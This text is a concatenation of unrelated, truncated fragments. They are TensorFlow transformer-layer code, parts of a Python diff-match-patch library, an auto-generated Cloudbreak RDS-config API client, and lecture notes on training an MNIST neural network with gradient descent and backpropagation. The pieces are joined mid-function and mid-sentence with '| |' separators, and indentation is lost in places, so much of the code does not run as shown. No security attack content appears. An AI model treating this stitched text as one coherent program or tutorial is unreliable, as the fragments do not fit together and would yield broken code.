  #   T = `to_tensor` sequence length
  #   N = `num_attention_heads`
  #   H = `size_per_head`

  # `query_layer` = [B, F, N, H]
  q = dense_layer_3d(from_tensor, num_attention_heads, size_per_head,
                     create_initializer(initializer_range), query_act, "query")

  # `key_layer` = [B, T, N, H]
  k = dense_layer_3d(to_tensor, num_attention_heads, size_per_head,
                     create_initializer(initializer_range), key_act, "key")

  # `value_layer` = [B, T, N, H]
  v = dense_layer_3d(to_tensor, num_attention_heads, size_per_head,
                     create_initializer(initializer_range), value_act, "value")
  # Move the head axis ahead of the sequence axis ([B, N, seq, H]) so that
  # the attention matmuls batch over heads.
  q = tf.transpose(q, [0, 2, 1, 3])
  k = tf.transpose(k, [0, 2, 1, 3])
  v = tf.transpose(v, [0, 2, 1, 3])
  if attention_mask is not None:
    # Reshaped to [B, 1, T, 1]; dot_product_attention broadcasts this
    # against the [length_q, length_kv] score matrix.
    attention_mask = tf.reshape(
        attention_mask, [batch_size, 1, to_seq_length, 1])
  # 'new_embeddings = [B, N, F, H]'
  new_embeddings = dot_product_attention(q, k, v, attention_mask,
                                         attention_probs_dropout_prob)

  # Back to [B, F, N, H] for the downstream projection layer.
  return tf.transpose(new_embeddings, [0, 2, 1, 3])
def attention_ffn_block(layer_input,
                        hidden_size=768,
                        attention_mask=None,
                        num_attention_heads=1,
                        attention_head_size=64,
                        attention_probs_dropout_prob=0.0,
                        intermediate_size=3072,
                        intermediate_act_fn=None,
                        initializer_range=0.02,
                        hidden_dropout_prob=0.0):
  """A network with attention-ffn as sub-block.

  One Transformer encoder layer: self-attention with a residual connection
  and layer norm, followed by a position-wise feed-forward network with its
  own residual connection and layer norm (post-LN ordering).

  Args:
    layer_input: float Tensor of shape [batch_size, from_seq_length,
      from_width].
    hidden_size: (optional) int, size of hidden layer.
    attention_mask: (optional) int32 Tensor of shape [batch_size,
      from_seq_length, to_seq_length]. The values should be 1 or 0. The
      attention scores will effectively be set to -infinity for any positions in
      the mask that are 0, and will be unchanged for positions that are 1.
    num_attention_heads: int. Number of attention heads.
    attention_head_size: int. Size of attention head.
    attention_probs_dropout_prob: float. dropout probability for attention_layer
    intermediate_size: int. Size of intermediate hidden layer.
    intermediate_act_fn: (optional) Activation function for the intermediate
      layer.
    initializer_range: float. Range of the weight initializer.
    hidden_dropout_prob: (optional) float. Dropout probability of the hidden
      layer.

  Returns:
    layer output
  """
  with tf.variable_scope("attention_1"):
    with tf.variable_scope("self"):
      # Self-attention: queries, keys and values all come from layer_input.
      attention_output = attention_layer(
          from_tensor=layer_input,
          to_tensor=layer_input,
          attention_mask=attention_mask,
          num_attention_heads=num_attention_heads,
          attention_probs_dropout_prob=attention_probs_dropout_prob,
          initializer_range=initializer_range)

    # Run a linear projection of `hidden_size` then add a residual
    # with `layer_input`.
    with tf.variable_scope("output"):
      attention_output = dense_layer_3d_proj(
          attention_output,
          hidden_size,
          attention_head_size,
          create_initializer(initializer_range),
          None,
          name="dense")
      attention_output = dropout(attention_output, hidden_dropout_prob)
  # Post-LN: layer norm is applied after the residual addition.
  attention_output = layer_norm(attention_output + layer_input)
  with tf.variable_scope("ffn_1"):
    with tf.variable_scope("intermediate"):
      # Expand to intermediate_size with the nonlinear activation.
      intermediate_output = dense_layer_2d(
          attention_output,
          intermediate_size,
          create_initializer(initializer_range),
          intermediate_act_fn,
          num_attention_heads=num_attention_heads,
          name="dense")
      with tf.variable_scope("output"):
        # Project back to hidden_size (linear).
        ffn_output = dense_layer_2d(
            intermediate_output,
            hidden_size,
            create_initializer(initializer_range),
            None,
            num_attention_heads=num_attention_heads,
            name="dense")
      ffn_output = dropout(ffn_output, hidden_dropout_prob)
  ffn_output = layer_norm(ffn_output + attention_output)
  return ffn_output
def transformer_model(input_tensor,
attention_mask=None,
hidden_size=768,
num_hidden_layers=12,
num_hidden_groups=12,
num_attention_heads=12,
intermediate_size=3072,
inner_group_num=1,
intermediate_act_fn="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
initializer_range=0.02,
do_return_all_layers=False):
"""Multi-headed, multi-layer Transformer from "Attention is All You Need".
This is almost an exact implementation of the original Transformer encoder.
See the original paper:
https://arxiv.org/abs/1706.03762
Also see:
https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py
Args:
input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size].
attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length,
seq_length], with 1 for positions that can be attended to and 0 in
positions that should not be.
hidden_size: int. Hidden size of the Transformer.
num_hidden_layers: int. Number of layers (blocks) in the Transformer.
num_hidden_groups: int. Number of group for the hidden layers, parameters
in the same group are shared.
num_attention_heads: int. Number of attention heads in the Transformer.
intermediate_size: int. The size of the "intermediate" (a.k.a., feed
forward) layer.
inner_group_num: int, number of inner repetition of attention and ffn.
intermediate_act_fn: function. The non-linear activation function to apply
to the output of the intermediate/feed-forward | |
after the last equality.
while pointer < len(diffs):
if diffs[pointer][0] == self.DIFF_EQUAL: # Equality found.
if (len(diffs[pointer][1]) < self.Diff_EditCost and
(post_ins or post_del)):
# Candidate found.
equalities.append(pointer)
pre_ins = post_ins
pre_del = post_del
lastequality = diffs[pointer][1]
else:
# Not a candidate, and can never become one.
equalities = []
lastequality = None
post_ins = post_del = False
else: # An insertion or deletion.
if diffs[pointer][0] == self.DIFF_DELETE:
post_del = True
else:
post_ins = True
# Five types to be split:
# <ins>A</ins><del>B</del>XY<ins>C</ins><del>D</del>
# <ins>A</ins>X<ins>C</ins><del>D</del>
# <ins>A</ins><del>B</del>X<ins>C</ins>
# <ins>A</del>X<ins>C</ins><del>D</del>
# <ins>A</ins><del>B</del>X<del>C</del>
if lastequality and ((pre_ins and pre_del and post_ins and post_del) or
((len(lastequality) < self.Diff_EditCost / 2) and
(pre_ins + pre_del + post_ins + post_del) == 3)):
# Duplicate record.
diffs.insert(equalities[-1], (self.DIFF_DELETE, lastequality))
# Change second copy to insert.
diffs[equalities[-1] + 1] = (self.DIFF_INSERT,
diffs[equalities[-1] + 1][1])
equalities.pop() # Throw away the equality we just deleted.
lastequality = None
if pre_ins and pre_del:
# No changes made which could affect previous entry, keep going.
post_ins = post_del = True
equalities = []
else:
if len(equalities):
equalities.pop() # Throw away the previous equality.
if len(equalities):
pointer = equalities[-1]
else:
pointer = -1
post_ins = post_del = False
changes = True
pointer += 1
if changes:
self.diff_cleanupMerge(diffs)
def diff_cleanupMerge(self, diffs):
  """Reorder and merge like edit sections.  Merge equalities.
  Any edit section can move as long as it doesn't cross an equality.

  Mutates `diffs` in place.  First pass: collapse each run of consecutive
  inserts/deletes (factoring common prefixes/suffixes into the neighbouring
  equalities) and merge adjacent equalities.  Second pass: slide single
  edits sideways across an equality when that lets two equalities merge.

  Args:
    diffs: Array of diff tuples.
  """
  diffs.append((self.DIFF_EQUAL, ''))  # Add a dummy entry at the end.
  pointer = 0
  count_delete = 0
  count_insert = 0
  text_delete = ''
  text_insert = ''
  while pointer < len(diffs):
    if diffs[pointer][0] == self.DIFF_INSERT:
      count_insert += 1
      text_insert += diffs[pointer][1]
      pointer += 1
    elif diffs[pointer][0] == self.DIFF_DELETE:
      count_delete += 1
      text_delete += diffs[pointer][1]
      pointer += 1
    elif diffs[pointer][0] == self.DIFF_EQUAL:
      # Upon reaching an equality, check for prior redundancies.
      if count_delete + count_insert > 1:
        if count_delete != 0 and count_insert != 0:
          # Factor out any common prefixes.
          commonlength = self.diff_commonPrefix(text_insert, text_delete)
          if commonlength != 0:
            x = pointer - count_delete - count_insert - 1
            if x >= 0 and diffs[x][0] == self.DIFF_EQUAL:
              # Append the common prefix to the preceding equality.
              diffs[x] = (diffs[x][0], diffs[x][1] +
                          text_insert[:commonlength])
            else:
              # No preceding equality; create one at the front.
              diffs.insert(0, (self.DIFF_EQUAL, text_insert[:commonlength]))
              pointer += 1
            text_insert = text_insert[commonlength:]
            text_delete = text_delete[commonlength:]
          # Factor out any common suffixes.
          commonlength = self.diff_commonSuffix(text_insert, text_delete)
          if commonlength != 0:
            # Prepend the common suffix to the equality we just reached.
            diffs[pointer] = (diffs[pointer][0], text_insert[-commonlength:] +
                              diffs[pointer][1])
            text_insert = text_insert[:-commonlength]
            text_delete = text_delete[:-commonlength]
        # Delete the offending records and add the merged ones.
        if count_delete == 0:
          diffs[pointer - count_insert : pointer] = [
              (self.DIFF_INSERT, text_insert)]
        elif count_insert == 0:
          diffs[pointer - count_delete : pointer] = [
              (self.DIFF_DELETE, text_delete)]
        else:
          diffs[pointer - count_delete - count_insert : pointer] = [
              (self.DIFF_DELETE, text_delete),
              (self.DIFF_INSERT, text_insert)]
        # Re-point past the merged records (delete first, then insert).
        pointer = pointer - count_delete - count_insert + 1
        if count_delete != 0:
          pointer += 1
        if count_insert != 0:
          pointer += 1
      elif pointer != 0 and diffs[pointer - 1][0] == self.DIFF_EQUAL:
        # Merge this equality with the previous one.
        diffs[pointer - 1] = (diffs[pointer - 1][0],
                              diffs[pointer - 1][1] + diffs[pointer][1])
        del diffs[pointer]
      else:
        pointer += 1
      count_insert = 0
      count_delete = 0
      text_delete = ''
      text_insert = ''

  if diffs[-1][1] == '':
    diffs.pop()  # Remove the dummy entry at the end.

  # Second pass: look for single edits surrounded on both sides by equalities
  # which can be shifted sideways to eliminate an equality.
  # e.g: A<ins>BA</ins>C -> <ins>AB</ins>AC
  changes = False
  pointer = 1
  # Intentionally ignore the first and last element (don't need checking).
  while pointer < len(diffs) - 1:
    if (diffs[pointer - 1][0] == self.DIFF_EQUAL and
        diffs[pointer + 1][0] == self.DIFF_EQUAL):
      # This is a single edit surrounded by equalities.
      if diffs[pointer][1].endswith(diffs[pointer - 1][1]):
        # Shift the edit over the previous equality.
        diffs[pointer] = (diffs[pointer][0],
                          diffs[pointer - 1][1] +
                          diffs[pointer][1][:-len(diffs[pointer - 1][1])])
        diffs[pointer + 1] = (diffs[pointer + 1][0],
                              diffs[pointer - 1][1] + diffs[pointer + 1][1])
        del diffs[pointer - 1]
        changes = True
      elif diffs[pointer][1].startswith(diffs[pointer + 1][1]):
        # Shift the edit over the next equality.
        diffs[pointer - 1] = (diffs[pointer - 1][0],
                              diffs[pointer - 1][1] + diffs[pointer + 1][1])
        diffs[pointer] = (diffs[pointer][0],
                          diffs[pointer][1][len(diffs[pointer + 1][1]):] +
                          diffs[pointer + 1][1])
        del diffs[pointer + 1]
        changes = True
    pointer += 1

  # If shifts were made, the diff needs reordering and another shift sweep.
  if changes:
    self.diff_cleanupMerge(diffs)
def diff_xIndex(self, diffs, loc):
  """loc is a location in text1, compute and return the equivalent location
  in text2.  e.g. "The cat" vs "The big cat", 1->1, 5->8

  Args:
    diffs: Array of diff tuples.
    loc: Location within text1.

  Returns:
    Location within text2.
  """
  chars1 = 0  # Characters of text1 consumed (equalities + deletions).
  chars2 = 0  # Characters of text2 consumed (equalities + insertions).
  last_chars1 = 0  # chars1 at the start of the diff containing loc.
  last_chars2 = 0  # chars2 at the start of the diff containing loc.
  # Pre-bind x so an empty `diffs` no longer raises NameError below.
  x = len(diffs)
  # range() instead of the Python-2-only xrange(); works on both versions.
  for x in range(len(diffs)):
    (op, text) = diffs[x]
    if op != self.DIFF_INSERT:  # Equality or deletion.
      chars1 += len(text)
    if op != self.DIFF_DELETE:  # Equality or insertion.
      chars2 += len(text)
    if chars1 > loc:  # Overshot the location.
      break
    last_chars1 = chars1
    last_chars2 = chars2
  if len(diffs) != x and diffs[x][0] == self.DIFF_DELETE:
    # The location was deleted.
    return last_chars2
  # Add the remaining len(character).
  return last_chars2 + (loc - last_chars1)
def diff_prettyHtml(self, diffs):
  """Convert a diff array into a pretty HTML report.

  Args:
    diffs: Array of diff tuples.

  Returns:
    HTML representation.
  """
  html = []
  for (op, data) in diffs:
    # Escape the HTML metacharacters, then render newlines visibly.
    # (The previous code had been corrupted by entity decoding — e.g.
    # replace("&", "&") was a no-op, leaving the output unescaped.)
    text = (data.replace("&", "&amp;").replace("<", "&lt;")
            .replace(">", "&gt;").replace("\n", "&para;<br>"))
    if op == self.DIFF_INSERT:
      html.append("<ins style=\"background:#e6ffe6;\">%s</ins>" % text)
    elif op == self.DIFF_DELETE:
      html.append("<del style=\"background:#ffe6e6;\">%s</del>" % text)
    elif op == self.DIFF_EQUAL:
      html.append("<span>%s</span>" % text)
  return "".join(html)
def diff_text1(self, diffs):
  """Compute and return the source text (all equalities and deletions).

  Args:
    diffs: Array of diff tuples.

  Returns:
    Source text.
  """
  # Insertions belong only to text2, so everything else is text1.
  return "".join(data for (op, data) in diffs if op != self.DIFF_INSERT)
def diff_text2(self, diffs):
  """Compute and return the destination text (all equalities and insertions).

  Args:
    diffs: Array of diff tuples.

  Returns:
    Destination text.
  """
  # Deletions belong only to text1, so everything else is text2.
  return "".join(data for (op, data) in diffs if op != self.DIFF_DELETE)
def diff_levenshtein(self, diffs):
  """Compute the Levenshtein distance; the number of inserted, deleted or
  substituted characters.

  Args:
    diffs: Array of diff tuples.

  Returns:
    Number of changes.
  """
  distance = 0
  inserted = 0
  deleted = 0
  for (op, data) in diffs:
    if op == self.DIFF_EQUAL:
      # A paired deletion and insertion counts as one substitution, hence
      # max() over the pending run rather than the sum.
      distance += max(inserted, deleted)
      inserted = 0
      deleted = 0
    elif op == self.DIFF_INSERT:
      inserted += len(data)
    elif op == self.DIFF_DELETE:
      deleted += len(data)
  # Flush any trailing insert/delete run.
  distance += max(inserted, deleted)
  return distance
def diff_toDelta(self, diffs):
  """Crush the diff into an encoded string which describes the operations
  required to transform text1 into text2.
  E.g. =3\t-2\t+ing  -> Keep 3 chars, delete 2 chars, insert 'ing'.
  Operations are tab-separated.  Inserted text is escaped using %xx notation.

  Args:
    diffs: Array of diff tuples.

  Returns:
    Delta text.
  """
  tokens = []
  for (op, data) in diffs:
    if op == self.DIFF_EQUAL:
      tokens.append("=%d" % len(data))
    elif op == self.DIFF_DELETE:
      tokens.append("-%d" % len(data))
    elif op == self.DIFF_INSERT:
      # High ascii will raise UnicodeDecodeError.  Use Unicode instead.
      # (Python 2 API: urllib.quote; the safe-character set keeps the
      # delta human readable.)
      tokens.append("+" + urllib.quote(data.encode("utf-8"),
                                       "!~*'();/?:@&=+$,# "))
  return "\t".join(tokens)
def diff_fromDelta(self, text1, delta):
"""Given the original text1, and an encoded string which describes the
operations required to transform text1 into text2, compute the full diff.
Args:
text1: Source string for the diff.
delta: Delta text.
Returns:
Array of diff tuples.
Raises:
ValueError: If invalid input.
"""
if type(delta) == unicode:
# Deltas should be composed of a subset of ascii chars, Unicode not
# required. If this encode raises UnicodeEncodeError, delta is invalid.
delta = delta.encode("ascii")
diffs = []
pointer = 0 # Cursor in text1
tokens = delta.split("\t")
for token in tokens:
if token == "":
# Blank tokens are ok (from a trailing \t).
continue
# Each token begins with a one character parameter which specifies the
# operation of this token (delete, insert, equality).
param = token[1:]
if token[0] | |
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off the southwest of the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. It abstracts the provisioning and eases the management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing you to spin up Hadoop clusters of arbitrary sizes on multiple cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers' APIs (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class V3workspaceIdrdsconfigsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
    # The Configuration object is always constructed, matching the
    # generated-client convention of touching the shared configuration
    # even when an explicit client is supplied.
    config = Configuration()
    if not api_client:
        # Lazily create the shared default client on first use.
        if not config.api_client:
            config.api_client = ApiClient()
        api_client = config.api_client
    self.api_client = api_client
def create_rds_config_in_workspace(self, workspace_id, **kwargs):
    """
    create RDS config in workspace
    An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.create_rds_config_in_workspace(workspace_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int workspace_id: (required)
    :param RdsConfig body:
    :return: RDSConfigResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Always ask for just the deserialized body.  With a `callback` the
    # _with_http_info variant returns the request thread, without one it
    # returns the data — either way we pass its result straight through,
    # so the sync and async paths collapse into a single delegation.
    kwargs['_return_http_data_only'] = True
    return self.create_rds_config_in_workspace_with_http_info(workspace_id, **kwargs)
def create_rds_config_in_workspace_with_http_info(self, workspace_id, **kwargs):
    """
    create RDS config in workspace
    An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.create_rds_config_in_workspace_with_http_info(workspace_id, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int workspace_id: (required)
    :param RdsConfig body:
    :return: RDSConfigResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['workspace_id', 'body', 'callback',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']

    # Collect parameters explicitly; unknown keywords are a caller bug.
    params = {'workspace_id': workspace_id}
    for key, val in kwargs.items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method create_rds_config_in_workspace" % key
            )
        params[key] = val

    # verify the required parameter 'workspace_id' is set
    if params['workspace_id'] is None:
        raise ValueError("Missing the required parameter `workspace_id` when calling `create_rds_config_in_workspace`")

    collection_formats = {}

    path_params = {'workspaceId': params['workspace_id']}
    query_params = []
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(['application/json']),
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(['application/json']),
    }
    form_params = []
    local_var_files = {}

    # Optional request body (RdsConfig); None when not supplied.
    body_params = params.get('body')

    # Authentication setting
    auth_settings = ['tokenAuth']

    return self.api_client.call_api('/v3/{workspaceId}/rdsconfigs', 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='RDSConfigResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def delete_rds_config_in_workspace(self, workspace_id, name, **kwargs):
    """
    delete RDS config by name in workspace
    An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_rds_config_in_workspace(workspace_id, name, callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int workspace_id: (required)
    :param str name: (required)
    :return: RDSConfigResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Always ask for just the deserialized body.  With a `callback` the
    # _with_http_info variant returns the request thread, without one it
    # returns the data — either way we pass its result straight through,
    # so the sync and async paths collapse into a single delegation.
    kwargs['_return_http_data_only'] = True
    return self.delete_rds_config_in_workspace_with_http_info(workspace_id, name, **kwargs)
def delete_rds_config_in_workspace_with_http_info(self, workspace_id, name, **kwargs):
    """
    delete RDS config by name in workspace
    An RDS Configuration describes a connection to an external Relational Database Service that can be used as the Hive Metastore.
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.delete_rds_config_in_workspace_with_http_info(workspace_id, name, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int workspace_id: (required)
    :param str name: (required)
    :return: RDSConfigResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Complete set of keyword arguments this endpoint accepts; anything
    # outside this list is rejected below as a caller error.
    all_params = ['workspace_id', 'name']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # `locals()` captures workspace_id/name/kwargs into one dict; kwargs are
    # then folded in so every argument can be looked up by name uniformly.
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method delete_rds_config_in_workspace" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'workspace_id' is set
    if ('workspace_id' not in params) or (params['workspace_id'] is None):
        raise ValueError("Missing the required parameter `workspace_id` when calling `delete_rds_config_in_workspace`")
    # verify the required parameter 'name' is set
    if ('name' not in params) or (params['name'] is None):
        raise ValueError("Missing the required parameter `name` when calling `delete_rds_config_in_workspace`")
    collection_formats = {}
    # Substitutions for the templated segments of the URL path.
    path_params = {}
    if 'workspace_id' in params:
        path_params['workspaceId'] = params['workspace_id']
    if 'name' in params:
        path_params['name'] = params['name']
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None  # DELETE carries no request body
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])
    # Authentication setting
    auth_settings = ['tokenAuth']
    # Delegate transport, (de)serialization and async handling to the
    # shared ApiClient.
    return self.api_client.call_api('/v3/{workspaceId}/rdsconfigs/{name}', 'DELETE',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='RDSConfigResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def get_rds_config_in_workspace(self, workspace_id, name, **kwargs):
    """
    get RDS config by name in workspace
    An RDS Configuration describes a connection to an external Relational
    Database Service that can be used as the Hive Metastore.
    The request is synchronous by default. Supply a `callback` function to
    make it asynchronous; the callback is invoked with the response and the
    request thread is returned immediately.
    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.get_rds_config_in_workspace(workspace_id, name, callback=callback_function)
    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int workspace_id: (required)
    :param str name: (required)
    :return: RDSConfigResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always strips the extra HTTP info (status,
    # headers) from the result of the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    delegate = self.get_rds_config_in_workspace_with_http_info
    if kwargs.get('callback'):
        # Asynchronous path: the delegate returns the request thread.
        return delegate(workspace_id, name, **kwargs)
    # Synchronous path: return just the deserialized response body.
    return delegate(workspace_id, name, **kwargs)
def get_rds_config_in_workspace_with_http_info(self, workspace_id, name, **kwargs):
"""
get RDS config by name in workspace
An RDS Configuration describe a connection to an external Relational Database Service that can be used as the Hive Metastore.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_rds_config_in_workspace_with_http_info(workspace_id, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int workspace_id: (required)
:param str name: (required)
:return: RDSConfigResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['workspace_id', 'name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_rds_config_in_workspace" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'workspace_id' is set
if ('workspace_id' not in params) or (params['workspace_id'] is None):
raise ValueError("Missing the required parameter `workspace_id` when calling `get_rds_config_in_workspace`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_rds_config_in_workspace`")
collection_formats = {}
path_params = {}
if 'workspace_id' in | |
= feed_forward(X)
return np.argmax(probabilities, axis=1)
predictions = predict(X_train)
print("predictions = (n_inputs) = " + str(predictions.shape))
print("prediction for image 0: " + str(predictions[0]))
print("correct label for image 0: " + str(Y_train[0]))
### Choose cost function and optimizer
To measure how well our neural network is doing we need to introduce a cost function.
We will call the function that gives the error of a single sample output the *loss* function, and the function
that gives the total error of our network across all samples the *cost* function.
A typical choice for multiclass classification is the *cross-entropy* loss, also known as the negative log likelihood.
In *multiclass* classification it is common to treat each integer label as a so called *one-hot* vector:
$$ y = 5 \quad \rightarrow \quad \hat{y} = (0, 0, 0, 0, 0, 1, 0, 0, 0, 0) ,$$
$$ y = 1 \quad \rightarrow \quad \hat{y} = (0, 1, 0, 0, 0, 0, 0, 0, 0, 0) ,$$
i.e. a binary bit string of length $C$, where $C = 10$ is the number of classes in the MNIST dataset.
Let $y_{ic}$ denote the $c$-th component of the $i$-th one-hot vector.
We define the cost function $\mathcal{C}$ as a sum over the cross-entropy loss for each point $\hat{x}_i$ in the dataset.
In the one-hot representation only one of the terms in the loss function is non-zero, namely the
probability of the correct category $c'$
(i.e. the category $c'$ such that $y_{ic'} = 1$). This means that the cross entropy loss only punishes you for how wrong
you got the correct label. The probability of category $c$ is given by the softmax function. The vector $\hat{\theta}$ represents the parameters of our network, i.e. all the weights and biases.
### Optimizing the cost function
The network is trained by finding the weights and biases that minimize the cost function. One of the most widely used classes of methods is *gradient descent* and its generalizations. The idea behind gradient descent
is simply to adjust the weights in the direction where the gradient of the cost function is large and negative. This ensures we flow toward a *local* minimum of the cost function.
Each parameter $\theta$ is iteratively adjusted according to the rule
$$ \theta_{i+1} = \theta_i - \eta \nabla \mathcal{C}(\theta_i) ,$$
where $\eta$ is known as the *learning rate*, which controls how big a step we take towards the minimum.
This update can be repeated for any number of iterations, or until we are satisfied with the result.
A simple and effective improvement is a variant called *Batch Gradient Descent*.
Instead of calculating the gradient on the whole dataset, we calculate an approximation of the gradient
on a subset of the data called a *minibatch*.
If there are $N$ data points and we have a minibatch size of $M$, the total number of batches
is $N/M$.
We denote each minibatch $B_k$, with $k = 1, 2,...,N/M$. The gradient then becomes:
$$ \nabla \mathcal{C}(\theta) = \frac{1}{N} \sum_{i=1}^N \nabla \mathcal{L}_i(\theta) \quad \rightarrow \quad
\frac{1}{M} \sum_{i \in B_k} \nabla \mathcal{L}_i(\theta) ,$$
i.e. instead of averaging the loss over the entire dataset, we average over a minibatch.
This has two important benefits:
1. Introducing stochasticity decreases the chance that the algorithm becomes stuck in a local minimum.
2. It significantly speeds up the calculation, since we do not have to use the entire dataset to calculate the gradient.
The various optimization methods, with codes and algorithms, are discussed in our lectures on [Gradient descent approaches](https://compphysics.github.io/MachineLearning/doc/pub/Splines/html/Splines-bs.html).
### Regularization
It is common to add an extra term to the cost function, proportional
to the size of the weights. This is equivalent to constraining the
size of the weights, so that they do not grow out of control.
Constraining the size of the weights means that the weights cannot
grow arbitrarily large to fit the training data, and in this way
reduces *overfitting*.
We will measure the size of the weights using the so called *L2-norm*, meaning our cost function becomes:
$$ \mathcal{C}(\theta) = \frac{1}{N} \sum_{i=1}^N \mathcal{L}_i(\theta) \quad \rightarrow \quad
\frac{1}{N} \sum_{i=1}^N \mathcal{L}_i(\theta) + \lambda \lvert \lvert \hat{w} \rvert \rvert_2^2
= \frac{1}{N} \sum_{i=1}^N \mathcal{L}(\theta) + \lambda \sum_{ij} w_{ij}^2,$$
i.e. we sum up all the weights squared. The factor $\lambda$ is known as a regularization parameter.
In order to train the model, we need to calculate the derivative of
the cost function with respect to every bias and weight in the
network. In total our network has $(64 + 1)\times 50=3250$ weights in
the hidden layer and $(50 + 1)\times 10=510$ weights to the output
layer ($+1$ for the bias), and the gradient must be calculated for
every parameter. We use the *backpropagation* algorithm discussed
above. This is a clever use of the chain rule that allows us to
calculate the gradient efficiently.
### Matrix multiplication
To train our network more efficiently, these equations are implemented using matrix operations.
The error in the output layer is calculated simply as, with $\hat{t}$ being our targets,
$$ \delta_L = \hat{t} - \hat{y} = (n_{inputs}, n_{categories}) .$$
The gradient for the output weights is calculated as
$$ \nabla W_{L} = \hat{a}^T \delta_L = (n_{hidden}, n_{categories}) ,$$
where $\hat{a} = (n_{inputs}, n_{hidden})$. This simply means that we are summing up the gradients for each input.
Since we are going backwards we have to transpose the activation matrix.
The gradient with respect to the output bias is then
$$ \nabla \hat{b}_{L} = \sum_{i=1}^{n_{inputs}} \delta_L = (n_{categories}) .$$
The error in the hidden layer is
$$ \delta_h = \delta_L W_{L}^T \circ f'(z_{h}) = \delta_L W_{L}^T \circ a_{h} \circ (1 - a_{h}) = (n_{inputs}, n_{hidden}) ,$$
